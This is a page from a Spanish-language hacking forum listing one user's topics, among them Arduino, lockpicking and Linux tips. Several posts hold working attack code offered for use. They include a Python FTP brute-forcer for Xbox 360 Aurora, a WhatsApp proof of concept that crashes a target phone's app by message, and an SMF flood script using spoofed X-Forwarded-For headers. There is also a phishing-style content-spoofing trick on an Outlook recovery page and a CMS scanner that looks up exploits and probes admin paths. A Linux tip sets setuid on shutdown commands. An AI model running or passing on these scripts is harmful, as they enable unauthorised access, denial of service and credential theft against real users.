Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - hielasangre

Páginas: [1] 2
1
Que tal? Alguien me podrá ayudar con esto?
el siguiente codigo sirve para prender un televisor samsung con arduino y un emisor ir

Código: [Seleccionar]

#include <IRremote.h>

IRsend irsend;

unsigned int S_pwr[68]={4550,4400,550,1700,550,1650,600,1600,600,550,550,550,
600,500,600,500,600,500,650,1600,600,1650,550,1650,600,500,600,550,550,550,600,
500,600,500,600,550,550,1650,600,500,600,550,550,550,600,500,600,500,600,550,550,
1650,600,500,600,1650,550,1650,600,1650,550,1650,600,1650,600,1600,600};

void setup()
{
Serial.begin(9600);
}

void loop() {

irsend.sendRaw(S_pwr,68,38);
delay(3000);

}


El tema es que necesito el rawcode para un aire de ventana de la marca frigidaire y no lo tengo, no tengo el control, mi idea es implementarlo con alexa para que se prenda y se apague



Si salguien sabe donde conseguir el rawcode o tiene uno de estos aires para ver como sacamos el codigo de encendido o apagado.

2
Buenas tardes, en la maquina que uso para trabajar tengo una sesión abierta del foro, quise abrirla en una que tengo para pentest únicamente y no me funciona en ningún navegador, a alguien más le pasa? No quiero cerrar esta sesión y probar por las dudas que ya no pueda volver a entrar! XD

3
Hacking / Documentos sobre lockpicking
« en: Julio 18, 2019, 12:09:35 am »

Para los interesados en el arte de abrir cerraduras, les comparto un par de documentos sobre lockpicking para que disfruten.

la clave de cifrado es: LI9zF0XO_MtCq2foNS9nYA

El enlace: https://mega.nz/#F!MbpXUYYI


4
Bugs y Exploits / XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce
« en: Diciembre 26, 2017, 02:01:21 am »

Código: [Seleccionar]
# Exploit Title: XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce
# Date: 20/12/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: http://phoenix.xboxunity.net/#/news
# Tested on: XBOX 360
# GREETZ: Iker Legorreta, #RemoteExecution Team



#!/usr/bin/env python
# -*- coding:utf-8 -*-

__author__ = 'Daniel Godoy'

import argparse
import sys
from ftplib import FTP

info = '''
XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce\n
Usage: ./xbox_ftp_brute_forcer.py [options]\n
Options: -t, --target    <hostname/ip>   |   Target\n
         -u, --user      <user>          |   User\n
         -w, --wordlist  <filename>      |   Wordlist\n
         -h, --help      <help>          |   print help\n

Example: ./xbox_ftp_brute_forcer.py -t 192.168.1.1 -u root -w
/root/Desktop/wordlist.txt
'''


def help():
    print info
    sys.exit(0)


def check_default_login(target):
    try:
        ftp = FTP(target)
        ftp.login('xboxftp', 'xboxftp')
        ftp.quit()
        print "\n[+] Default login is open."
        print "\n[+] Username : xboxftp"
        print "\n[+] Password : xboxftp\n"
        ftp.quit()
    except:
        pass


def ftp_login(target, username, password):
    try:
        ftp = FTP(target)
        ftp.login(username, password)
        ftp.quit()
        print "\n[*] Credentials have found."
        print "\n[*] Username : {}".format(username)
        print "\n[*] Password : {}".format(password)
        return True
    except:
        return False


def brute_force(target, username, wordlist):
    try:
        wordlist = open(wordlist, "r")
        words = wordlist.readlines()
        for word in words:
            word = word.strip()
            if ftp_login(target, username, word):
                break
    except:
        print "\n[-] There is no such wordlist file. \n"
        sys.exit(0)



parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target")
parser.add_argument("-u", "--username")
parser.add_argument("-w", "--wordlist")

args = parser.parse_args()

if not args.target or not args.username or not args.wordlist:
    help()
    sys.exit(0)

target = args.target
username = args.username
wordlist = args.wordlist

brute_force(target, username, wordlist)
check_default_login(target)
print "\n[-] Brute force finished. \n"

5
Android / [PoC] Crashear la app de un contacto de WhatsApp. (Android)
« en: Diciembre 26, 2014, 11:08:51 pm »
Codigo para que funcione con yowsup

http://www.exploit-db.com/exploits/35637/



Enlace a Pastebin: http://pastebin.com/CZChGAnG
Código: [Seleccionar]
#!/usr/bin/python
#-*- coding: utf-8 -*
 
# Title: WhatsApp Remote Reboot/Crash App Android
# Product: WhatsApp
# Vendor Homepage: http://www.whatsapp.com
# Vulnerable Version(s): 2.11.476
# Tested on: WhatsApp v2.11.476 on MotoG 2014 -Android 4.4.4
# Date: 26/12/2014
# #RemoteExecution - www.remoteexecution.net
#
# Author Exploit:
#   Daniel Godoy       @0xhielasangre    <[email protected]>
# Credits:
#   Gonza Cabrera
#
# Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
#
# Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
# It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even
# engaging in an interactive conversation over WhatsApp protocol
#

import argparse, sys, os, csv
from Yowsup.Common.utilities import Utilities
from Yowsup.Common.debugger import Debugger
from Yowsup.Common.constants import Constants
from Examples.CmdClient import WhatsappCmdClient
from Examples.EchoClient import WhatsappEchoClient
from Examples.ListenerClient import WhatsappListenerClient
from Yowsup.Registration.v1.coderequest import WACodeRequest
from Yowsup.Registration.v1.regrequest import WARegRequest
from Yowsup.Registration.v1.existsrequest import WAExistsRequest
from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2
from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2
from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2
from Yowsup.Contacts.contacts import WAContactsSyncRequest
 
import threading,time, base64
 
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
COUNTRIES_CSV = "countries.csv"
 
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
 
 
######## Yowsup Configuration file #####################
# Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n
# phone:    Your full phone number including country code, without '+' or '00'
# id:       This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup
#       on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions
#       of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on
#       a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials
#       or want to register, you can leave this field blank or set it to some random text.
# password: Password to use for login. You obtain this password when you register using Yowsup.
######################################################
MINE_CONFIG ="config"
 
def getCredentials(config = DEFAULT_CONFIG):
    if os.path.isfile(config):
        f = open(config)
         
        phone = ""
        idx = ""
        pw = ""
        cc = ""
         
        try:
            for l in f:
                line = l.strip()
                if len(line) and line[0] not in ('#',';'):
                     
                    prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1)
                     
                    varname = prep[0].strip()
                    val = prep[1].strip()
                     
                    if varname == "phone":
                        phone = val
                    elif varname == "id":
                        idx = val
                    elif varname =="password":
                        pw =val
                    elif varname == "cc":
                        cc = val
 
            return (cc, phone, idx, pw);
        except:
            pass
 
    return 0
 
def main(phone):
    credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG )
 
    if credentials:
         
        countryCode, login, identity, password = credentials
        identity = Utilities.processIdentity(identity)
 
        password = base64.b64decode(password)
 
        # Custom message that will crash WhatsApp
        message = message = "#RemoteExecution??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????6?? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????"
 
        #print countryCode, login, identity, password
        wa = WhatsappEchoClient(phone, message)
        wa.login(login, password)
     
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("number", help="Phone number to send the crash message")
    parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
    args = parser.parse_args()
 
    Debugger.enabled = args.verbose
    main(args.number)

6
Back-end / [PHP][Geo - #RemoteExecution]
« en: Septiembre 29, 2014, 12:54:45 pm »
Hace mucho tiempo que existe una web llamada http://geo.tsmcasin.com donde uno ingresando la característica y número de un teléfono celular o fijo nos da la información sobre la empresa,localidad,modalidad,etc...
Estos datos se podían bajar en un archivo .xls de la Comisión Nacional de Comunicaciones (http://www.cnc.gov.ar)
Tenia la Base de Datos hace algún tiempo y por fin me decidí a darle un uso al que se le pueda sacar provecho.
Aquí les dejo todo lo necesario para implementar este sistema en sus webs.
Aclaro que el sistema es solo valido para Argentina y también recomiendo incorporar un captcha si es que lo van a dejar para uso publico



PD: La captura es de una versión vieja que tenia y que modifique anoche.

http://www.mediafire.com/download/ac278ebde4yjq26/GEO.tar.gz

Nota: Voy a actualizar el script porque lo hice a las apuradas. Saludos!

PD: Como dije por ahí , mis post no dicen "Fuente: ESET Latinoamerica xD"

7
Python / SMF Incorrect Flood Filter Headers
« en: Agosto 21, 2014, 10:49:25 pm »








Código: Python
  1. #!/usr/bin/python
  2. # RemoteExecution
  3. #Autor: Daniel Godoy A.K.A hielasangre
  4.  
  5. import sys, threading, time, urllib2,re
  6. print "Ingrese URL: "
  7. url = raw_input()
  8. a = b = c = d = 1
  9. count = 0
  10. class SMFPwner(threading.Thread):
  11.   def __init__(self, num):
  12.       threading.Thread.__init__(self)
  13.       self.num = num      
  14.   def run(self):
  15.     while 1:
  16.         global a,b,c,d,count, url
  17.         data = ""
  18.         while 1:
  19.             while 1:
  20.                 if d!=250:
  21.                     d+=1
  22.                 else:
  23.                     if c!= 250:
  24.                         c+=2
  25.                         d=0
  26.                     else:
  27.                         if b!=250:
  28.                             c=0
  29.                             d=0
  30.                             b+=1
  31.                         else:
  32.                             a+=1
  33.                             b=0
  34.                             c=0
  35.                             d=0
  36.                 head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d)
  37.                 headers = { 'X-Forwarded-For' : head }
  38.                 req = urllib2.Request(url, data, headers)
  39.                 f = urllib2.urlopen(req)
  40.                 count += 1
  41.                 print "[ Visitando => " + url + " Por " + str(count) +" vez ]"
  42. for i in range(3):      
  43.         ta = SMFPwner(i)
  44.         ta.start()
  45.  

Si bien no es una vulnerabilidad comprometedora, nos permite promocionar entre los primeros puestos (estadísticas) a nuestros posts, de manera arbitraria... Lo cual al menos, resulta divertido.

Fuente: http://foro.remoteexecution.net

8
Off Topic / Puntos de vista
« en: Mayo 16, 2014, 10:15:40 pm »
Bueno empiezo este post y vamos a ver como sale.
Me dirijo a ustedes usuarios de underc0de y staff, para hacerles una pregunta sin ánimos de ofender o atacar.
Ayer tuve un entredicho con un usuario del foro, que en realidad salto como leche hervida :P sacando eso, me preocupo su contestación.



http://oi59.tinypic.com/28cdpwh.jpg

En serio esa es la mentalidad de este foro íntegramente? Ustedes comparten esa manera de pensar?  No se aceptan opiniones en los post de ese tipo? Esto es acaso no es un foro? Que tiene que exprese mi opinión, no creo haber hecho uso de malas palabras...Reconozco que a lo mejor mi apreciación personal en cuanto a la capacidad haya sido un poco molesta, pero en eso si hago mea culpa.
Sin embargo creo que una persona que es del staff de un foro en donde se invita a compartir y aprender, no es la forma de dirigirse a un usuario del foro, a mi personalmente poco me importa si me corren o no de underc0de, pero si la intención de ustedes es crecer, pondría a ver algunas cuestiones...
En fin hago este post porque me dijo que cualquier queja la haga en otro post, aunque puntualmente no es una queja, sino mas bien una critica (Espero que constructiva)

Ahora por otro lado, espero que si alguien me va a corregir.. Comprenda la manera correcta de escribir, ya que el "haber haber" es de existencia (osea algo que "HAY") y el a ver, a ver... Seria algo así como diciendo ... "Mirá, mira.." Se entiende?

Otra cosa que me gustaría remarcar es el comentario en cuanto a los post tengo 77 post, si y como le dije a ANTRAX, entrare a postear cada vez que pueda ayudar o que pueda hacer algo diferente no hacer algo copy & paste y debajo poner : ESET Latinoamerica o algo por el estilo... Para ir redondeando, me gustaría que si a alguien no le gusta el post, lo borre y también se deshaga de mi usuario.. Ya que no me interesa participar de una comunidad donde se censura a lo usuarios :)

Antes de cerrar este post, debo agradecer a Alan++ por hacerme ver un par de cosas, y animarme a que escriba este post :)
Saludos a los users, y perdonen si les hago perder un poco de tiempo :)
__EOF__

9
Off Topic / RFID / NFC Workshop
« en: Abril 12, 2014, 08:57:23 pm »
RFID/NFC Course
"Algunos van a Tecnópolis, nosotros vamos a aprender algo..."
Sábado 17 de Mayo.
De 9 a 18.
Microcentro, Sala de Meetings
Cupo: 24 asientos.
Descuento por pago durante Mes de Abril.

Abierta la inscripción.
Consultas: [email protected]

Temario: https://www.troopers.de/troopers14/troopers14-1-day-workshop-rfid-nfc/index.html
(traé pochoclo)

Gracias por compartir!

PD: Lo hice y por eso recomiendo el workshop, si alguno quiere mencione que leyo de mi parte (Daniel Godoy) sobre el curso, se le hara descuento  ;)
Saludos, y aprovechen que se acaban las vacantes al toque!  '^^

10
GNU/Linux / Apagar la PC sin tener que ser ROOT
« en: Marzo 28, 2014, 02:42:56 pm »
Bueno, aclaro que esto lo probe en slackware 14.1, Pero eh de suponer que funciona en las demas distros de GNU/Linux, si alguien se anima a probar y comentarlo mejor.

Hace algún tiempo vengo usando openbox (ganas de complicarme) y la verdad que estoy bastante contento con el resultado estético que logre.

Como no pude encontrar ningún paquete o similar que contenga la gestión de apagado/reinicio del equipo hice un script para facilitarme esto.





Para usar el mismo lo primero que tuve que hacer es:

Creamos un grupo que va  a tener privilegios para apagar el equipo:
Código: [Seleccionar]
groupadd apagado

Ya teniéndolo listo metemos los usuarios que deseemos que puedan apagar el equipo:
Código: [Seleccionar]
gpasswd -a hielasangre apagado

Ahora Cambiamos el grupo de los comandos Halt , Reboot , ShutDown:
Código: [Seleccionar]
chgrp Apagado /sbin/shutdown /sbin/reboot /sbin/halt
Cambiamos los permisos de los anteriores comandos:
Código: [Seleccionar]
chmod u+s,o-rwx /sbin/shutdown /sbin/reboot /sbin/halt
Creamos los enlaces simbólicos para que los comandos estén en el PATH del usuario:
Código: [Seleccionar]
ln -s /sbin/halt /usr/bin/halt
ln -s /sbin/reboot /usr/bin/reboot
ln -s /sbin/shutdown /usr/bin/shutdown


Y para simplificar aun mas la tarea hice este script (para que funcione, deben tener instalado gxmessage):

Código: [Seleccionar]
#!/bin/bash

gxmessage "Elegir alguna de las opciones" -center -title "Que desea hacer?" -font "OCR A Std 10" -default "Cancelar" -buttons "_Cancelar":1,"_Reiniciar":2,"_Apagar":3,

case $? in

1) echo "Exit";;
2) /usr/bin/shutdown -r now;;
3) /usr/bin/shutdown -h now;;

esac

Y listo, ya podemos adjuntar a nuestras opciones de menú de usuario  ;)

11
SASO Conf

Primera Conferencia de Informática en Curuzú Cuatiá

Software Libre, Redes Libres & Seguridad

Viernes 14 y Sábado 15 de Marzo 2014

Registrarse para poder asistir al envento.

La palabra “libre” siempre ha acompañado a nombres de redes y aplicaciones libres, es por eso que para no salirnos del marco identificativo hemos optado por usar como nombre “sãso” el cual significa “libre” en nuestro tradicional idioma Guaraní.



Actividades:
http://www.sasoconf.com.ar/index.php/actividades/

12
Electrónica y Robótica / Proyecto Pinguino
« en: Marzo 04, 2014, 06:32:29 pm »

Pinguino es una plataforma similar a Arduino, y compatible con ella, pero basada en los micro-controladores PIC Microchip de 8 o 32 bits. Ademas, Pinguino se trata de hardware y software abierto. La meta de este proyecto es construir un IDE (Ambiente de Desarrollo Integrado, por sus siglas en ingles) el cual sea fácil de usar en GNU/Linux, Windows y Mac OS X. Arduino es una herramienta poderosa, pero tiene algunos defectos. Uno de estos inconvenientes es que no posee una interfaz USB nativa en el chip, limitando algunas de sus posibilidades. Ademas tiene menor variedad de periféricos integrados en el micro.

Instalar las bibliotecas:

Código: [Seleccionar]
libusb-1.0-0
python-wxgtk2.8
python-usb


Este script use para instalar el IDE de pinguino en slackware 14.1 si alguien le sirve dejo el script.

Código: [Seleccionar]
#!/bin/sh
# Script para instalar Pinguino IDE version beta 7 in Slackware 14.1
# Daniel Godoy : [email protected]

wget http://www.delincuentedigital.com.ar/pinguino%20beta%207/pinguino%20beta7%20linux%20.tar.gz

echo ------------------- "Creando Directorio"

mkdir pinguino 2>/dev/null
mv pinguino\ beta7\ linux\ .tar.gz pinguino/
cd pinguino


echo ------------------- "Desembalaje de archivos y eliminacion de el archivo .tar"

tar xzf pinguino\ beta7\ linux\ .tar.gz
rm pinguino\ beta7\ linux\ .tar.gz


echo ------------------- "Creando Permisos"

sudo groupadd microchip 2>/dev/null
sudo usermod -a -G microchip $USER


cd pinguino\ beta7\ linux\ /

sudo cp 41-microchip.rules /etc/udev/rules.d/
sudo cp 26-microchip.rules /etc/udev/rules.d/

echo ------------------- "Pinguino IDE instalado!"


Info del proyecto:

http://wiki.pinguino.cc/index.php/Main_Page
http://blog.pinguino.cc/


Los materiales para construir son estos:

http://microembebidos.wordpress.com/2012/02/13/tutorial-pinguino-construye-tu-placa-pinguino-core-pic18f4550/

NOTA: yo no encontraba todos los elementos ( y ahorre en algunos por eso por ahi la placa no se ve igual a la mia :P )







UPDATE: Les recomiendo un ide mucho mas completo!!!

https://github.com/PinguinoIDE/pinguino-ide

13

Muy buena nota en CQC que les dejo para el que no la pudo ver o que quiere volver a verla :D

14
Hacking / [outlook] Vector de Ataque Web mediante ingeniería social
« en: Enero 26, 2014, 10:34:31 pm »
Después de mucho tiempo sin escribir voy a hacer un post sencillo y breve...
El ataque no es algo muy elaborado, pero el ataque es viable por medio de una variable (donde se especifica el correo al cual se envía la información cuando uno intenta resetear su clave)


El enlace es:

Código: [Seleccionar]
https://account.live.com/MessagePage.aspx?message=autocsrsuccess&[email protected]
Texto donde figura el correo electronico que aparece en la url:

Código: [Seleccionar]
Enviaremos un mensaje de correo electrónico a [email protected] para informarle si brindó suficiente información para recuperar su cuenta. Generalmente se necesitan alrededor de 24 horas para revisar la información enviada. Si ya envió una solicitud, la cerraremos y echaremos un vistazo en esta.

Si agregamos texto después del correo electrónico, podemos "alterar" el contenido de la web. Esto facilitaría a un atacante, que ingrese una url (solo en texto plano, ya que la web no permite tags html) engañando a la victima para que le facilite datos sensibles para el posterior robo de credenciales.

Por ejemplo, se podría realizar un ataque modificando la url y con un poco de ingenio dejarlo de la siguiente manera:

Eso es todo.

#RemoteExecution 2014
__EOF__

15
Pentesting / [En Desarrollo][#Beastie - Multiple CMS Scaner - Toolkit]
« en: Febrero 27, 2013, 01:34:47 pm »
Esta herramienta la tengo algo olvidada, prometo actualizarla dentro de poco.

Acá dejo el código que empeze el sábado pasado y hoy retome, la idea es hacer una especie de scanner que identifique que cms (por ahora joomla o wordpress) y nos busque en www.exploit-db.com el enlace en el caso de que haya algún exploit para los módulos o plugins afectados... Como dije esta en desarrollo, le falta mucho todavia, pero esta alpha me va a permitir corregir algunos detalles, me gustaría que lo prueben y comenten.
Para una próxima actualización la idea es buscar las fallas mas conocidas como ser lfi,rfi,xss,sqli para el caso de webs que no sean cms como los citados anteriormente, también busca los directorios que mas nos interesan (phpmyadmin,admin,etc...)







Código: [Seleccionar]
<?php
/*
 *      
 *      
 *      Copyright 2012 hielasangre <[email protected]>
 *      
 *      This program is free software; you can redistribute it and/or modify
 *      it under the terms of the GNU General Public License as published by
 *      the Free Software Foundation; either version 2 of the License, or
 *      (at your option) any later version.
 *      
 *      This program is distributed in the hope that it will be useful,
 *      but WITHOUT ANY WARRANTY; without even the implied warranty of
 *      MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *      GNU General Public License for more details.
 *      
 *      You should have received a copy of the GNU General Public License
 *      along with this program; if not, write to the Free Software
 *      Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
 *      MA 02110-1301, USA.
 */
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>[#Beastie - Multiple CMS Scaner - Toolkit]</title>
<style>
body
{
background: #1a1a1a;
}
#resultados
{
background: #161616;
text-align: left;
padding:3px;

}
#textarea
{
overflow-x: scroll;
overflow-y: hidden;
background: #000;
border-style:solid;
border-color: #CCC;
border-width: 2px;
}
#contenedor
{
margin-left:auto;
margin-right:auto;
padding: 25px;
width:800px;
color:#FFF;
background: #161616;
border-style:solid;
border-color: #101010;
border-width: 5px;
background: #1a1a1a;
margin: 5px 0 5px 0;
border-radius:7px;
-moz-border-radius: 7px;
-webkit-border-radius : 7px;
}
input,textarea,select
{
background-color: black;
margin:6px 0 3px 0;
color: #FFF;
font-family: courier new;
font-size: 18px;
border: solid 1px #555;
}
.chico
{
text-align: center;
font-size: 10px;
font-family: Tahoma;
}
#resultados a:visited
{
color:#CCC;
text-decoration: none;
}
#resultados a:link
{
color:#CCC;
text-decoration: none;
}
#resultados a:hover
{
color:#FF0000;
text-decoration: none;
}

td.resultados
{
width: 798px;
border-style:solid;
border-color: #555;
border-width: 1px;
}
td.resultados:hover
{
background-color:#000;
text-decoration: none;
}

#paginador a:visited
{
font-size:18px;
color:#CCC;
text-decoration: none;
}
#paginador a:link
{
font-size:18px;
color:#CCC;
text-decoration: none;
}
#paginador a:hover
{
font-size:18px;
color:#FF0000;
text-decoration: none;
}

</style>
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
</head>
<body>
<center>
<div id="contenedor">
     <img src="http://www.remoteexecution.info/img/logo.png">
<form action="" method="post">
<table>
<tr>
<td colspan="2"><input type="text" name="target" size="70"/></td>
</tr>
<tr>
<td class="chico" colspan="2" width="100%">Ingrese URL.</td>
</tr>
<tr>
<td width="50%" ></td>
<td width="50%" align="right"><input type="submit" name="submit" value="Test! >" /></td>
</tr>
</table>
</form>
<?php
$target strip_tags(trim($_POST['target']));
if(isset($target) && ($target!=''))
{
  $ch curl_init();
              
curl_setopt($chCURLOPT_RETURNTRANSFER1);
              
curl_setopt($chCURLOPT_HEADER1);
              
curl_setopt($chCURLOPT_URL$target);
              
$result curl_exec($ch);
  curl_close($ch);
  $cabeceras explode("\n\r\n"$result);
  $headers $cabeceras[0];
  function identificar($target)
{
    $joomla $target."/administrator/";
$fp curl_init($joomla);
$ret curl_setopt($fpCURLOPT_RETURNTRANSFER1);
$ret curl_setopt($fpCURLOPT_TIMEOUT30);
$ret curl_exec($fp);
$info curl_getinfo($fpCURLINFO_HTTP_CODE);
curl_close($fp);
if($info == 200)
{
echo 'El sistema base es: <a href="http://www.joomla.org/" target="_blank">Joomla!</a><br/>';
global $cms;
$cms "1";
}
$wordpress $target."/wp-login.php";
$fp curl_init($wordpress);
$ret curl_setopt($fpCURLOPT_RETURNTRANSFER1);
$ret curl_setopt($fpCURLOPT_TIMEOUT30);
$ret curl_exec($fp);
$info curl_getinfo($fpCURLINFO_HTTP_CODE);
curl_close($fp);
if($info == 200)
{
echo 'El sistema base es: <a href="http://wordpress.org/" target="_blank">Wordpress</a>';
global $cms;
$cms "2";
}
}
function edb($componente)
{
$exploitdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$componente&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
$ch curl_init();
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER1);
curl_setopt($chCURLOPT_URL$exploitdb);
$fuentecurl_exec($ch);
curl_close($ch);
if (preg_match("/No results/",$fuente))  
{
ob_flush();
echo '<tr><td class="resultados">'.$componente.'</td></tr>';
flush();
}
else{
if($componente!=' ')
{
ob_flush();
echo '<tr><td class="resultados"><a href="'.$exploitdb.'" target="_blank">'.$componente.'</a></td></tr>';
flush();
}
}
}
function wp_plugins($result)
{
preg_match_all("#/plugins/(.*?)/#i"$result$f);
$plugins=array_unique($f[1]);
if(count($plugins)==0)
{
ob_flush();
echo '<td class="resultados ">No fue posible encontrar nada relacionado a este CMS</td><br>';
flush();
}
foreach($plugins as $plugin)
{
edb($plugin);
}
}
function joomla_components($site)
{
$ch curl_init();
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER1);
curl_setopt($chCURLOPT_URL$site);
$sourcecurl_exec($ch);
curl_close($ch);
preg_match_all('{option,(.*?)/}i',$source,$f);
preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
preg_match_all('{/components/(.*?)/}i',$source,$f3);
$arreglo=array_merge($f2[1],$f[1],$f3[1]);
$componentes=array();
if(count($arreglo)==0)
{
ob_flush();
echo '<td class="resultados ">No fue posible encontrar nada relacionado a este CMS</td>"';
flush();
}
foreach(array_unique($arreglo) as $x)
{
$componentes[]=$x;
}
foreach($componentes as $componente_encontrado)
{
edb($componente_encontrado);
}
}
              if (
preg_match("/200 OK/"$result))
{
                     echo 
'<div id="resultados">';
                     echo 
'El sitio ingresado (<a href="'.$target.'" target="_blank">'.$target.'</a>) devuelve: <br/>';
                     echo 
'<div id="textarea"><pre>'.htmlentities($headers).'</pre></div><br/>';
                     
identificar($target);
                     echo 
'<table>';
 if($cms == "1")
{
joomla_components($target);
}
 if($cms == "2")
{
wp_plugins($result);
}
                     echo 
'</table>';  
                     echo 
'</div><br>';
                     
$list = array('/phpMyAdmin/''/phpmyadmin/','/PMA/','/pma/','/admin/','/dbadmin/','/mysql/''/myadmin/''/phpmyadmin2/','/phpMyAdmin2/''/phpMyAdmin-2/'
   '/php-my-admin/','/phpMyAdmin-2.2.3/''/phpMyAdmin-2.2.6/''/phpMyAdmin-2.5.1/''/phpMyAdmin-2.5.4/''/phpMyAdmin-2.5.5-rc1/',
   '/phpMyAdmin-2.5.5-rc2/''/phpMyAdmin-2.5.5/''/phpMyAdmin-2.5.5-pl1/''/phpMyAdmin-2.5.6-rc1/''/phpMyAdmin-2.5.6-rc2/''/phpMyAdmin-2.5.6/'
                                   
'/phpMyAdmin-2.5.7/''/phpMyAdmin-2.5.7-pl1/''/phpMyAdmin-2.6.0-alpha/''/phpMyAdmin-2.6.0-alpha2/''/phpMyAdmin-2.6.0-beta1/'
                                   
'/phpMyAdmin-2.6.0-beta2/''/phpMyAdmin-2.6.0-rc1/''/phpMyAdmin-2.6.0-rc2/''/phpMyAdmin-2.6.0-rc3/','/phpMyAdmin-2.6.0/'
                                   
'/phpMyAdmin-2.6.0-pl1/''/phpMyAdmin-2.6.0-pl2/''/phpMyAdmin-2.6.0-pl3/''/phpMyAdmin-2.6.1-rc1/''/phpMyAdmin-2.6.1-rc2/',
                                   
